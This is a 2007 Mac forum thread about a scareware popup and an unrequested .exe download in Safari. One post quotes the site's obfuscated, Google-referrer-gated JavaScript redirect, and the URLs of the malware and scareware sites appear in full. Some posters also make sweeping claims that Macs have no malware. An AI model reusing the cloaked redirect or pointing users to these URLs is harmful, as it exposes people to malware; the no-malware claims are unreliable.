Windows spyware and Safari

Discussion in 'macOS' started by Schtibbie, Aug 21, 2007.

  1. Schtibbie macrumors 6502

    Joined:
    Jan 13, 2007
    #1
    So my wife tells me she was surfing the web on Safari (Mac OS) the other day and clicked on a Google search result page and got an *uncloseable* window that popped up saying "You have spyware" and a file suddenly appeared on the desktop. She tells me it was an .exe file, which means really this is a non-issue since this isn't a Windows machine.

    But I'd like to know - how did this happen in Safari? How was the window made uncloseable? How was a file made to download spontaneously? And does that (by itself) even pose a potential risk?

    Very sorry I don't have the URL for the site right now, but I'll try to recover it from her history later tonight and repost if I can.
     
  2. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #2
    I can speculate alot, but most likely its an ads, generated by javascript in the page. which is nomral annoyance on the internet. no big deal

    however, the file on the desktop with *.exe expansion should not be happening. that would be a potential security threat.

    I still need the URL to confirm.

    I think firefox has better pop-up control, which should prevent the first event. for automatically download an *.exe to desktop. I m puzzled of why safari would do such a thing at all.

    un-closable windows. if she means clicking close button will close current window, but a new window will open right away, then its a javascript trick. if she means clicking the close button has absolutely no effect. that would be a strange case I can only guess its a random system glitch that is not a big problem.
     
  3. scaredpoet macrumors 604

    scaredpoet

    Joined:
    Apr 6, 2007
    #3
    I would bet you that the window wasn't "uncloseable" at all, but was made to look like a dialog box with an "ok" button on it when in fact clicking on the "ok" button just takes you to whatever malware they want you to download and install. This is very common among unsavory malware vendors, and when such oodd messages pop up, you have to very carefully look for visual cues that give it away as an ad rather than a dialog box.
     
  4. mozmac macrumors 6502

    mozmac

    Joined:
    Apr 28, 2005
    Location:
    Austin, TX
    #4
    You know, every once in a while, I'll be surfing the net (sorry, can't remember if it's Firefox or Safari on Windows, I use both simultaneously) and I'll get system messages asking if I want to download a .exe file. So weird, cause i haven't even clicked on anything and it's usually when I'm using one of Google's sites. I have no idea what it is, and don't feel like clicking Ok to find out.
     
  5. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #5
    mouse hovering around some object in the page can trigger the javascript.

    asking you to download is no big deal, because you are in control

    not asking you is a serious problem, cause you are NOT in control.
     
  6. Schtibbie thread starter macrumors 6502

    Joined:
    Jan 13, 2007
    #6
    I found the website if anyone wants to look at it.

    http://lyfammaapjzl.cn/1070.html

    found by searching google for Graco baby products. IF you hit the site through google, the spyware runs:

    It contains the following javascript:

    if(top.document.referrer.indexOf("google") != -1 && top.document.referrer.indexOf("search") != -1 && top.document.referrer.indexOf("=") != -1 && top.document.referrer.indexOf("?") != -1 && top.document.referrer.indexOf("site:") == -1 && top.document.referrer.indexOf("site%3A") == -1 && top.document.referrer.indexOf("inurl:") == -1 && top.document.referrer.indexOf("inurl%3A") == -1)
    {
    var upis1='http://scanner.s';
    var upis2='py-shredder';
    var upis3='.com/5/?advid=1487';
    var piska00="win";
    var piska01="dow.";
    var piska02="loca";
    var piska03="tion='";
    var piska1="'";
    eval(piska00+piska01+piska02+piska03+upis1+upis2+upis3+piska1);
    }
     
  7. Makosuke macrumors 603

    Joined:
    Aug 15, 2001
    Location:
    The Cool Part of CA, USA
    #7
    What that Javascript does, in essence, is if you're coming in from Google send you to this URL:

    http://scanner.spy-shredder.com/5/?advid=1487

    (Note: That is a garbage malware site, so beware clicking if you're on Windows).

    What the site does is throw up a simulated "malware scan" or some such (nice artificial progress bars). When it "finishes", it does two things: One, downloads a small .exe (which I assume is a virus or other malware), and two, throws up a graphic within the window that looks like an XP-themed popup window. In reality it's just some Javascript, and when you click the fake close button it warns you. It tries to get you to click and then go through the "install" process, which of course bypasses any security in the process of installing their malware.

    When I tried it in Camino, it did download the .exe without warning or user input, as far as I could tell, but if I just cancelled the bogus "error" popup it would actually close the fake "window" easily enough.

    Safari (v3 beta on Mac) did the same, but didn't try to download the .exe until I clicked on something, at which point it gave the standard "this may contain an executable--are you sure you want to download it?" error. I clicked cancel, and it didn't. So that appeared to work as it's supposed to.

    So far as I can tell there's nothing unusual about this--Safari behaves how it should when a bit of code tells it to download a file, and no "unclosable" window results--just some garbage fake popup windows that are really just javascript.

    Oh, and the second time you go to that URL, you get a different page, so it's different after the first try.
     
  8. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #8
    If you are using a Mac, it makes precious little difference if you download the *.exe files or not. These are Windows code and cannot run on the Mac.
     
  9. Blubbert macrumors 6502

    Joined:
    Nov 1, 2006
    #9
    It makes a serious difference if the .exe is downloaded automatically. That would be a major security vulnerability for Safari. If files are just downloaded arbitrarily, ther is a possibilty that the next time it might not be a .exe file but a malicious script or piece of code that could affect you mac i some way.
     
  10. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #10
    That's a very big "if." I have never seen anything download automatically via Safari.

    Your argument is not that the .exe file is dangerous in and of itself, but that dealing with it makes users less diligent about other threats. This is a whole other issue that deserves serious discussion.
     
  11. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #11
    what if next time its a mac trojan or mac worm?

    you can say "if" is not "certain", but I think if we put aside the reality of possibility, there is no risk we need to talk about anymore.
     
  12. dejo Moderator

    dejo

    Staff Member

    Joined:
    Sep 2, 2004
    Location:
    The Centennial State
    #12
    I'm curious how this might be different then, say, the Download link on a site like versiontracker.com, whereby you are directed to a new page but the download starts automatically as well.

    On a side note, Apple needs to make Safari's "Open 'safe' files after downloading" preference be turned off by default.
     
  13. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #13
    apple also needs to give an option (better by default) that "ask users where to save the download", this will surely make users aware of any download thats about to happen.
     
  14. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #14
    There are no Mac trojans or worms.
     
  15. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #15
    I admire your absolute apple fan style statement.

    may I further ask, is there any chance there will be a mac trojans tomorrow? the day after tomorrow, 2008, 2009? (not saying there is no mac trojans now, but I need to digg some evidences before making statement).

    or also, how about spyware, adware, and other malwares?
     
  16. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #16
    There have been precious few Mac viruses since System 6/7. Except for the occasional Microsoft Office macrovirus, virtually none on MacOS 8 or MacOS 9. There have been absolutely zero viruses on any version of MacOS X, which has been out since like 2001. That is what, six years? So yes, I like the odds of being virus-free tomorrow, next year, and the year after that.
     
  17. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #17
    please, you can't just ignore those security patches, can you? how many of them have apple issued this year to to now? if you count the patches for windows, how many vista viruses now in the wild?

    you sure can blame M$ for office macro virus, but when user get it when working under OSX. its a OSX virus.

    OS8, OS9, be realistic, who is still writing viruses, trojans, worms for a OS virtually has no market share?

    users' practical safety is much more important than flat statement. If there is a chance user get hurt, fix it.
     
  18. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #18
     
  19. kolax macrumors G3

    Joined:
    Mar 20, 2007
  20. Blubbert macrumors 6502

    Joined:
    Nov 1, 2006
    #20
    The fact that there are no OSX viruses yet doesn't in any way decrease the chance that there might be one, or several, tommorow or a few years down the road. The "there weren't and there sill aren't any Mac viruses" stance is what makes a potential mac virus ever more dangerous. The lax stance most users take with security, placated by that mantra, is a major security hole no company can fix. The fact is that most OSX users are practicing, to use a metaphor, unsafe sex. Just because none got an STD just yet doesn't mean that they wont get something in the future. Good luck with Halle ;).
     
  21. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #21
    There is something called "due diligence." There is also "undue diligence." This would be akin to installing burglar alarms on every door and window of your bungalow on your private South Seas island. There is a third category, "undue but necessary diligence." This is akin to having to buy all those alarms because your relatives will steal all of your stuff if you don't.

    The best predictor of the future is the past. If something never happened in the past, it is likely that it will never happen in the future. I find it ironic that people here allow their imaginations run wild over imaginary threats. Yet, on Windows it is becoming increasingly difficult to distinguish between the "good guys" and the "bad guys," but the "good guys" are at fault. Earlier this week, HP's web site forced me to download an Active X control in order to download a print driver. This was totally unnecessary. In a previous post, concern was expressed about the possible security relaxation as a result of downloading innocuous Windows malware. Yet, Active X is one of the most dangerous technologies ever invented, HP forces it on its customers, and the Windows fan boys say nothing. Yet they whine about imaginary MacOS X viruses. Go figure :rolleyes:
     
  22. Blubbert macrumors 6502

    Joined:
    Nov 1, 2006
    #22
    Please, do not confuse me for a Windows Fanboy, in no way am i saying that Windows is better than OSX. Hell with the ammount of viruses and malware available for that OS its a miracle things get done.
    The fact that worries me most about OSX is that it lulls the users into an overwhelming sense of security. It is not "undue dilligence" as you called it to practice good safety while using your computer. The fact that a lot of Mac users have no regard for safety is a major problem. If and when the day comes when the first Mac virus is written, the odds are that it will spread like wildfire trough the community because of their bad security practices.
    To use a more real life example, I have never had my car stolen, yet i still lock it every time i leave it. The fact that it was never stolen before doesnt mean it wont be stolen this time, but the locked door could be enough of a deterrent for a thief. It is easier to find an unlocked door than to bother with a locked one. Locking your car door and using your brain while using the computer are not "undue dilligence", they simply make sense.
     
  23. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #23
    No, it is not a "major problem," it is a potential problem. Nonexistent problems cannot be considered to be major when real problems like media failures and power surges do real damage that costs real money.

    That's a very big if, but it will not have the consequences that you predict. First off, the patches from Apple that so many here make such a big thing about reduce the number of potentially exploitable vulnerabilities. There are currently zero MacOS X viruses. With the number of vulnerabilities decreasing, the chances that an undiscovered vulnerability will be found before it is fixed is also decreasing. Any prospective MacOS X virus writer is banging his head against a wall that the masons are building longer, wider, and thicker.

    The notion that a MacOS X virus can spread like wildfire is fanciful. Apps downloaded to MacOS X do not run automatically. Every new account barrier crossed needs user permission, usually from a user with administrative privileges. There are just too many firebreaks in the system, even in the most unlikely event of gross negligence, for viruses or other malware to travel faster than word of its existence.

    Then there are some issues that most people who discuss this don't like to talk about--the true responsibility for malware. Malware is so prevalent on Windows because Microsoft designed it that way. The communities that developed around that platform routinely engage in behavior that is inherently insecure. Users have some responsibility. Microsoft has major responsibility. But, the community of Windows software developers and hardware vendors are also major culprits. In an earlier post, I mentioned HP's website requiring that my Windows computer download an ActiveX control in order to download a printer driver. I have three Dells which are used by a group which I cannot police. Those Dells have a lot of crap on them. But, most of the crap was installed by Dell!

    If you are a Windows user who is plagued by malware, you can cut your exposure by 100% by switching to MacOS X. There is nothing is life more certain than that. Is some diligence called for after you make the switch? Yes, but not the same level required under Windows. Think about how your life would change if you moved from Bagdad to Bar Harbor. Would you want to live in Bar Harbor like you did in Bagdad? Would it be necessary? Of course it would not be. You take certain obvious precautions, but you lead a different happier life.

    Like the Bar Harbor transfer from Bagdad, the MacOS X user can afford to lead a different computer life than the Windows user. I certainly do. If I have any hope of making a go of it with Halle, I have things other than Mac viruses to worry about.
     
  24. jasonnorm macrumors regular

    jasonnorm

    Joined:
    Aug 10, 2007
    Location:
    Milford, MA
    #24
    I just tried this on a Windows XP system using Safari (beta 3). Yes I'm brave :) lol

    Well, no file was "automatically" downloaded so obviously user interaction was required. Closing the window with the fake close button or selecting ignore etc. will initiate the download. Simply closing the window with "Windows (or commad) - W closed the pop-up without any problems.

    Remember... Command (or Windows) W is your friend :)
     
  25. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #25
    Im interested about where you get those numbers that there are now more people writing viruses for OS clssic than osx. better not be the case like 90 vs 89, and with all of them part time.
    there is no logical like this in virus industry, Apple patch one security hole here doesn't mean there is no hole elsewhere, and there is no guarantee their patch will not introduce new holes. virus industry isn't that simple as you might suggest. and this is not math 1-1=0
    safari run "safe download" automatically by default, if OP listed case is real, safari will automatically download something, and then run it automatically, I doubt anybody would like that
    yes, its atrade off, for system speed, M$ allow users to control deep level hardwares, which is security threat, I just felt your example bit odd, as your experience, you need activex to download a hp printer driver? Im sure you can do it w/o activex in firefox.

    if by malware, you mean craps installed through activex, then firefox solve it. and there are other malwares.
    I don't think your assertion of 100% is helpful.

    I guess the difference is I think users need to be cautious about security threat, and you think OSX is safe enough, user don't need to worry about it, now or in the future. which I can't agree

    you can save the energy if you just want to suggest currently there is no virus (strictly defined, does not include trojans, worms or malwars) for OSX, which I agree.

    eventually, after much talk, nobody like their browsers downloading stuff to HDD without them being asked.
     

Share This Page